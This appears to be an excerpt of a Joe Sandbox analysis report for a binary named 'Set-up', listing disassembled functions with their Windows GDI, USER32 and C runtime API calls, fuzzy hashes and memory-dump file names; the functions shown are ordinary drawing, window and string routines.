Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$BrushCreateDeleteEllipseSolid
String ID:
API String ID: 3360253338-0
Opcode ID: eb2b63b58800b880748b7b610b17e79c34bd8286446d345610d34070b6e966a1
Instruction ID: 2eda2740cf086e28070e0438d70a0ef1e17e95e13765cf043583726c22769916
Opcode Fuzzy Hash: eb2b63b58800b880748b7b610b17e79c34bd8286446d345610d34070b6e966a1
Instruction Fuzzy Hash: 64110775900208AFCF00AFA1D88AA6A7FB5EF58310F1240A5FD059B226D735DD69CFA0

Function 00A63350 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A63385
DeleteObject.GDI32(00000000), ref: 00A6338A
CreateSolidBrush.GDI32(?), ref: 00A6339F
SelectObject.GDI32(?,00000000), ref: 00A633AC
Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00A633E1

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$BrushCreateDeleteRectangleSolid
String ID:
API String ID: 3123465668-0
Opcode ID: b287186ada697777be552f9d6efa98ff25b6ad8e26a38775a8300cb3316b3e8f
Instruction ID: d9681f4784df2aa8267d63bfe5eb5628ccf93d79d7d6e2c40e11b75195fd14ad
Opcode Fuzzy Hash: b287186ada697777be552f9d6efa98ff25b6ad8e26a38775a8300cb3316b3e8f
Instruction Fuzzy Hash: F2110775900208EFCF00AFA1D88AA6A7FB5EF48310F1240A5FD059B226D735DD69CFA0

Function 00A63550 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A63579
DeleteObject.GDI32(00000000), ref: 00A63582
CreateSolidBrush.GDI32(?), ref: 00A63597
SelectObject.GDI32(?,00000000), ref: 00A635A4
RoundRect.GDI32(?,00000001,00000000,-00000001,00000000,00000008,00000008), ref: 00A635DC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$BrushCreateDeleteRectRoundSolid
String ID:
API String ID: 1288606822-0
Opcode ID: d405cdc8a8aff9bc735cfb7218bf9fc2e2398b77c9b2ecf8552379a271860d42
Instruction ID: 75f99c998dee7ce54065e60d81c09f634b42bc8fd18c5a2f3906256a333d733b
Opcode Fuzzy Hash: d405cdc8a8aff9bc735cfb7218bf9fc2e2398b77c9b2ecf8552379a271860d42
Instruction Fuzzy Hash: AE11F87140460ABFDB00AF61DC09B6ABBB5FF14311F118154F94693660CB35AAAACFD0

Function 00A630C0 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

__RTDynamicCast.VCRUNTIME140(?,00000000,00C61508,00C61548,00000000), ref: 00A630DD
CreateCompatibleDC.GDI32(?), ref: 00A630EA
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00A63100
SelectObject.GDI32(?,00000000), ref: 00A6310D
SetTextAlign.GDI32(?,00000018), ref: 00A6311B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CompatibleCreate$AlignBitmapCastDynamicObjectSelectText
String ID:
API String ID: 96065740-0
Opcode ID: 5285740ea283e3b0760ab1321dd70dc3f719172ac45111939a346474c2c9773c
Instruction ID: a47170dc44d52326a018abf5dc7d8196eafb69214c44c70820b2710c5edcb93f
Opcode Fuzzy Hash: 5285740ea283e3b0760ab1321dd70dc3f719172ac45111939a346474c2c9773c
Instruction Fuzzy Hash: EC113C35500605AFCB109FA2DC08F6AFFA5FF48312F048565F95A836A1CB71A860DB90

Function 00A67F90 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00A67F9D
SelectObject.GDI32(00000000), ref: 00A67FAB
StretchBlt.GDI32(00000000,?,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00A67FD0
SelectObject.GDI32(00000000,00000000), ref: 00A67FD8
DeleteDC.GDI32(00000000), ref: 00A67FDF

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteStretch
String ID:
API String ID: 732282326-0
Opcode ID: 992231cd7cd377b128cffb33929f9671ed3cdde0fc7fd33ae4409ed39d8d26dc
Instruction ID: da0ef55e14c8e3709b755814b890deb58c6ee1cf9fef4fca9227c707a22b194d
Opcode Fuzzy Hash: 992231cd7cd377b128cffb33929f9671ed3cdde0fc7fd33ae4409ed39d8d26dc
Instruction Fuzzy Hash: 99F03AB1210304BBE7245BA5DC8EF6F7AACDB08265F110158BE0ED6291EAA0AC00C6A4

Function 00ACE2A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00ACE4FC
GetSysColor.USER32(00000014), ref: 00ACE506
GetSysColor.USER32 ref: 00ACE51D

Strings

2, xrefs: 00ACE3DC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Color
String ID: 2
API String ID: 2811717613-450215437
Opcode ID: 63c6e8a7f45406fe5b7ecc2d290405f4dc31e3faa7fc93b8d4c282db398e154b
Instruction ID: 3fe34329dd6c84972f2059874c4f36751b79f152f655f88e572b5ddcd21ba5b0
Opcode Fuzzy Hash: 63c6e8a7f45406fe5b7ecc2d290405f4dc31e3faa7fc93b8d4c282db398e154b
Instruction Fuzzy Hash: 90D1B1B0205B42AFE355CF24C158796FBE0BF44308F14465CE5A85B782C7BAA569CFD2

Function 00A7C5D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A7C76D

Strings

gfff, xrefs: 00A7C5D9
gfff, xrefs: 00A7C5EF
gfff, xrefs: 00A7C712

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: gfff$gfff$gfff
API String ID: 3668304517-4275324669
Opcode ID: d49f9f78538857cc099c6e20b808b7dd35081b5f3c652c34e6fc0a7cb48f8243
Instruction ID: a49154ef67d0f0cf5d711fce5f4480268189ab90c537b78d00f34e688d97771b
Opcode Fuzzy Hash: d49f9f78538857cc099c6e20b808b7dd35081b5f3c652c34e6fc0a7cb48f8243
Instruction Fuzzy Hash: 4851C172A001158BCB28DF2DD9C4969B7A5EB84360719C2AEE85DCF345EB30ED44CBD1

Function 00A8BE80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00A8BF8A

Strings

gfff, xrefs: 00A8BEAC
gfff, xrefs: 00A8BE88
gfff, xrefs: 00A8BEC6

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: gfff$gfff$gfff
API String ID: 3668304517-4275324669
Opcode ID: af3d4de0fa20a924bdc557ec0f6b8c27926f6872634ad8bf02c6f493296e4e35
Instruction ID: e592696357f3e58460dbac85aa0da32bb3e852f0983e66695eecdc5ac3a249c4
Opcode Fuzzy Hash: af3d4de0fa20a924bdc557ec0f6b8c27926f6872634ad8bf02c6f493296e4e35
Instruction Fuzzy Hash: 0C61BDB2A001069FC718EF2DD884A69FBA1FF84354714C26EE919CB341E731EE55CBA1

Function 00BECEF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,.xXnN,?,00BD845D), ref: 00BECF55

Strings

.xXnN, xrefs: 00BECF4F

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strpbrk
String ID: .xXnN
API String ID: 3024680390-518896573
Opcode ID: afc4465ea7112fe196ac69395e72f13a0ff463608ac84d47fd1eab7caccf68db
Instruction ID: 82442dc4877858a289453a01fe7bdbff2db77dd30de5868532e07a9a04e93ad4
Opcode Fuzzy Hash: afc4465ea7112fe196ac69395e72f13a0ff463608ac84d47fd1eab7caccf68db
Instruction Fuzzy Hash: B441CA316083858FD724DF2DD8516ABBBE2EFC8714F0486AEE84987245EF319909C7D2

Function 00AD1420 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(70576E16,?,?,?,70576E16), ref: 00AD14FC

Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,000000FF,?,?), ref: 00AD160A
Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00AD1647
Part of subcall function 00AD15A0: atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00AD168A

Strings

, xrefs: 00AD1497
/* X, xrefs: 00AD149E
PM *, xrefs: 00AD14A6

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: atol$_invalid_parameter_noinfo_noreturn
String ID: $/* X$PM *
API String ID: 330352240-2013423866
Opcode ID: 00c7636de2b14a704f51917c9196c604adef09c23f7579063d3a13c41598d28b
Instruction ID: 2a6055cd92bd0ecceb57e7ec1995f57fbf1fb0ef496188876ec41b85845e408f
Opcode Fuzzy Hash: 00c7636de2b14a704f51917c9196c604adef09c23f7579063d3a13c41598d28b
Instruction Fuzzy Hash: E6310BB1E00204ABDB15CF64E9857AEBB74EB80314F10826EE8178B3C6C77DD944C791

Function 00BDAB30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00BDAB42
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00BDAB5C
lua_pushstring.SET-UP(?,00000000), ref: 00BDAB67

Strings

exit, xrefs: 00BDABC4

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errnolua_pushstringstrerror
String ID: exit
API String ID: 2053890457-2483651598
Opcode ID: 1664a837ba938245929e2039d083e913929927136aeb9c3bcc1a096b44f92eec
Instruction ID: 9b043a0fd8b710ca25fd2e2d41c2c91fa237110b3e6b5b053eb267d54a35e189
Opcode Fuzzy Hash: 1664a837ba938245929e2039d083e913929927136aeb9c3bcc1a096b44f92eec
Instruction Fuzzy Hash: C83178B5600A049FD7108F18D484B26FBE5EB44338F14C59AE89A8B792D37AEC42CF91

Function 00A63670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 00A636A6
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
SelectObject.GDI32(?,00000000), ref: 00A63741

Strings

(, xrefs: 00A636D1

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Create$CompatibleObjectSectionSelect
String ID: (
API String ID: 2004861804-3887548279
Opcode ID: 9901edd346983032d206eac6f7214d50737620f9dab02d483575e1548a527455
Instruction ID: 1b1a9099ad1db6859498182ce68dbc56da897d5db4cb798999e16e6b444351ec
Opcode Fuzzy Hash: 9901edd346983032d206eac6f7214d50737620f9dab02d483575e1548a527455
Instruction Fuzzy Hash: 7A31A6B49017099FDB64CFA8D554BAEBBF4FB08704F10852DE85AA7780D775AA08CF90

Function 00A72020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000FA), ref: 00A72034
CreateWindowExW.USER32(00000000,CallTip,ACallTip,80000000,00000064,00000064,00000096,00000014,?,00000000,00000000), ref: 00A72060

Strings

CallTip, xrefs: 00A72059
ACallTip, xrefs: 00A72054

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$CreateLong
String ID: ACallTip$CallTip
API String ID: 1475011609-1662286206
Opcode ID: d7efa294ac51c3497b348f2ff36a25922d5a73178738cc171328058ec7f77cb7
Instruction ID: 84c7170c13a9106b372386e2561abf44c86386bf062a95b75bec204f34f77d85
Opcode Fuzzy Hash: d7efa294ac51c3497b348f2ff36a25922d5a73178738cc171328058ec7f77cb7
Instruction Fuzzy Hash: A1F01C70A48B51AEE7305F648C09FC37A94EB0571AF11061DB6AF691D0C7F52450CF50

Function 00A97180 Relevance: 6.3, APIs: 4, Instructions: 287COMMON

Download Yara Rule

APIs

Part of subcall function 00A6B960: memcpy.VCRUNTIME140(?,70576E16,70576E16,?,?,70576E16,?,00000001,?,00A97221,?,?,70576E16,70576E16,?,70576E16), ref: 00A6B988

?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z.MSVCP140(00000000,00000000,?,?,70576E16,70576E16,?,70576E16,70576E16), ref: 00A97237
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A972BD
?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z.MSVCP140(00000000,00000000,?,?,?), ref: 00A97344

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ?tolower@?$ctype@D@std@@$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3511086462-0
Opcode ID: bfdde20a1d2998bfa5dbe4218e5fb0ecfbd5bda0c963e22230224e46c896ba75
Instruction ID: e507a3e8a369392e2fd9954bf798a4ae5aacfff2a0fab135dc298f4a87180cf0
Opcode Fuzzy Hash: bfdde20a1d2998bfa5dbe4218e5fb0ecfbd5bda0c963e22230224e46c896ba75
Instruction Fuzzy Hash: FFC12571E042089FDB15CFA8C984BADBBF5FF48304F248159E819AB392D735AA45CF60

Function 00A67C80 Relevance: 6.2, APIs: 4, Instructions: 233COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00A67CA0
ClientToScreen.USER32(?,?), ref: 00A67CC3
MonitorFromRect.USER32(?,00000002), ref: 00A67D55

Part of subcall function 00A67BA0: GetMonitorInfoW.USER32(?,00000028), ref: 00A67BDB

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000014), ref: 00A67EE0

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: MonitorWindow$ClientFromInfoLongRectScreen
String ID:
API String ID: 3229540926-0
Opcode ID: 8a577a768686e83d07ac638df0fff01de9a7a894c8c9571efcd81fcc8fd1538c
Instruction ID: 595933764eeaefb1811dea51faae9f101a7e4da746bb5843196676db809ab81e
Opcode Fuzzy Hash: 8a577a768686e83d07ac638df0fff01de9a7a894c8c9571efcd81fcc8fd1538c
Instruction Fuzzy Hash: FC91D9B1E0110AEBCF02AF90D5596EE7FB4FF44750FA18884E855B22A9E73589318FC4

Function 00A63C60 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 00A63670: CreateCompatibleDC.GDI32(?), ref: 00A636A6
Part of subcall function 00A63670: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00A63727
Part of subcall function 00A63670: SelectObject.GDI32(?,00000000), ref: 00A63741

AlphaBlend.MSIMG32(?,?,?,?,?,?,00000000,00000000,?,?), ref: 00A63EEE
SelectObject.GDI32(?,?), ref: 00A63F02
DeleteObject.GDI32(?), ref: 00A63F11
DeleteDC.GDI32(?), ref: 00A63F1C

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
